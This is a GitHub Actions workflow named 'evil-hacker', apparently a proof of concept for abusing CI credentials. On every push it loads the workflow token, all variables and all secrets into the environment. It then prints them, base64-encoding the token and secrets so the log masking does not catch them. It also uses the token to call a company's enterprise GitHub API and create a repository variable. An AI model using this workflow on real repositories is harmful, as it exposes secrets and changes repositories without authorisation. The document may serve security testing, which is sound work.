name: evil-hacker
on:
  push
 
jobs:
  hack-you:
    #environment: "test"
    permissions:
      id-token: write # This is required for requesting the GitHub JWT
    runs-on: [ "Linux" ]
    steps:
    - name: hacking code
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        VARS: ${{ toJson(vars) }}
        SECRETS: ${{ toJson(secrets) }}
      shell: bash
      run: |
        printenv
        echo "$GITHUB_TOKEN"  | base64
        #curl -v -H "Authorization: bearer $GITHUB_TOKEN" https://git.t3.daimlertruck.com/api/v3/
        #curl -v -H "Authorization: token $GITHUB_TOKEN" https://git.t3.daimlertruck.com/api/v3/
        #curl -v -L -H "Accept: application/vnd.github+json" -H "Authorization: Bearer $GITHUB_TOKEN" -H "X-GitHub-Api-Version: 2022-11-28"  "https://git.t3.daimlertruck.com/api/v3/repos/$GITHUB_REPOSITORY/environments"
 
        # does not work curl -L -X POST -H "Accept: application/vnd.github+json" -H "Authorization: Bearer $GITHUB_TOKEN" -H "X-GitHub-Api-Version: 2022-11-28" "https://git.t3.daimlertruck.com/api/v3/repos/$GITHUB_REPOSITORY/issues" -d '{"title":"Found a bug","body":"I'\''m having a problem with this."}'
 
        curl -L -X POST -H "Accept: application/vnd.github+json" -H "Authorization: Bearer $GITHUB_TOKEN" -H "X-GitHub-Api-Version: 2022-11-28"  "https://git.t3.daimlertruck.com/api/v3/repos/$GITHUB_REPOSITORY/actions/variables" -d '{"name":"NEWVAR","value":"VARIABLE"}'
 
        echo "$VARS"
        echo "$SECRETS" | base64
